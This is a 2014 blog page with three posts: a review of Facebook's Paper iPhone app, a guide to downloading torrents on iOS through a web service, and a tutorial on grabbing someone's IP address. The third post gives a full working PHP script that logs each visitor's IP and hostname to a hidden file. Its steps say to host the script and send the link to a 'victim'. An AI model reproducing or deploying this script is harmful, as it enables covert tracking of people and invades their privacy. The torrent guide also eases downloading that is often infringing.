Monday, 24 February 2014

‘Paper ‘ the best facebook app ever seen


facebook has released their new iphone app called Paper to redefine the current newspaper trends . This app is now available from Apple’s App.if you are an facebook user from your iphone you should experience this app.because this is not a side project of facebook like messenger or other services .Facebook worked much hard for developing this app .
Paper’s Facebook feed is just a better-looking, more responsive version of what you’ll find inside the company’s main app. Every other section is a mix of recent and popular posts from the profile pages of Facebook's favorite publishers, curated by a small (and powerful) editorial team within the company. In Headlines, for example, you'll find posts from Time, the AP, The New York Times, Politico, and etc In Cute, you'll find a range of more curated posts from the likes of Grumpy Cat, Laughing Squid, and Zooey Deschanel's site HelloGiggle

fb2

  facebook  implemented fully revised new interface for this app.it really does dispense with much of the stuff that associate with Facebook like companies trade mark and blue trim color  etc.now everything is cleaner with a large content pannel on the top and smaller horizontally – scrolling ones on the bottom, lots of big images and wonder full fluid animation effects are also enclosed in this app which gives entirely new reading passion to readers.Everything from swipes to pinch-and-zooms respond instantaneously and naturally, and images load quickly.

fb1

there is a big pannel on the top and browsable smaller one below.even though the app still displays articles by giving you the same view you’d seen if you simply visited the site where it was published it shows in a less cramped full screen mode which makes for easier reading .and it provides options for saving and sharing news with your friends and all.
so why you are waiting download it now its self .
https://www.facebook.com/paper



How To Download Torrents Onto Your iOS Device Without Jailbreaking



Apple has never allowed users to use BitTorrent clients on their iOS devices, blocking every single one from reaching the App Store. Most tutorials will teach you how to download torrents onto your iOS device with a jailbreak solution, but today, I’ll be showing you how to download torrents onto your iOS device even if you’re not too keen on jailbreaking. And best of all, it’s free!
First, let’s clear up some misconception. The BitTorrent technology is perfectly legal to use, but the act of downloading copyrighted material using BitTorrent technology is illegal. Many people just assume that all torrent downloads is illegal, and those people are truly missing out on something amazing. There is a whole lot of legal content to be downloaded from BitTorrent, ranging from Linux distributions, to music, video, etc. 
Download-Torrents-iPhone-main
As I mentioned before, Apple blatantly refuses to allow any torrent clients onto the App Store, despite the fact that you can download just as much illegal content using the mobile Safari browser. Luckily, there are ways for iOS users to download torrents without jailbreaking, and the best part is that you can use Safari to do so.
I’ll be using an iPhone 5 for this tutorial with iOS 7 installed. Make sure you have a fast internet connection, as this method may not work properly on slow connections. WiFi should be the best, but 3G will work too. I’ll be downloading a music video file for this tutorial, but this method should work for any type of file that is compatible with your iOS device (movies, ebooks etc.)
NoteMTE does not support downloading copyrighted material. The file downloaded in this tutorial is just for teaching purposes, and in no way should be perceived as MTE supports downloading copyrighted material.
1. Open up your browser on your iOS device. Search for the torrent you want to download and copy its “magnet” or download link. For example the magnet link in the torrent below:

2. Once you’ve copied the download link or magnet link, open up a new tab, and head over to zbigz.

3. When the site has successfully loaded, there will be a bar to enter a link in the middle of the site. Enter the magnet link you copied earlier there, and click on “Go.”

4.  Your file will automatically start to download. Once the download complete, you can click on the file to open it.

Zbigz’s free service is pretty decent at allowing both large files and few deal breaking restrictions, but you do remember, you do gain a bit by going premium, which is $10 for a month or $85 for a year. I consider that is a bit too much for downloading a few quick torrent files on the go, but if you are a heavy torrent user, it just might be worth it.



Thursday, 13 February 2014

How To Grab Someone IP Address ?




In this tutorial i will you show you how to grab someone Ip address using PHP script.This method can be used to grab someone Ip address on yahoo or Facebook chat or by sending mail to victim. So Lets get started.

How To Hack Someone Ip Address ?


1. Copy the below codes into Notepad and save it as Grab.php (.php is must)


<?php
$hostname = gethostbyaddr($_SERVER['REMOTE_ADDR']);
$img_number = imagecreate(400,95);
$backcolor = imagecolorallocate($img_number,10,102,153);
$textcolor = imagecolorallocate($img_number,255,255,255);

imagefill($img_number,0,0,$backcolor);
$number0 = " This is Your IP/Proxy";
$number1 = " IP: $_SERVER[HTTP_X_FORWARDED_FOR]";
$number2 = " Host/Proxy: $hostname";
$number4 = " _________________________________";

Imagestring($img_number,10,5,5,$number0,$textcolor);
Imagestring($img_number,10,5,25,$number1,$textcolor);
Imagestring($img_number,10,5,45,$number2,$textcolor);
Imagestring($img_number,10,5,50,$number4,$textcolor);
Imagestring($img_number,10,8,50,$number4,$textcolor);
Imagestring($img_number,10,5,10,$number4,$textcolor);
Imagestring($img_number,10,8,10,$number4,$textcolor);

header("Content-type: image/png");
imagepng($img_number);
$file=fopen("Name-here-to-protect-the-File.txt","a");
$file2 = "- IP joined - IP/Proxy: $_SERVER[HTTP_X_FORWARDED_FOR] - Host: $hostname - '\n' ";
fwrite($file, $file2);
fclose($file);
?>



     2. Now make Free account on any of  the free web hosting sites Ripway or on My3gb .
    3. Now Upload Grab.php to your web hosting site.
    4. Copy the link of your  uploaded file and send it to victim.
    5. As soon as victim will click on your link his ip will be saved in your free web hosting site.
    6. Enjoy you are Done !!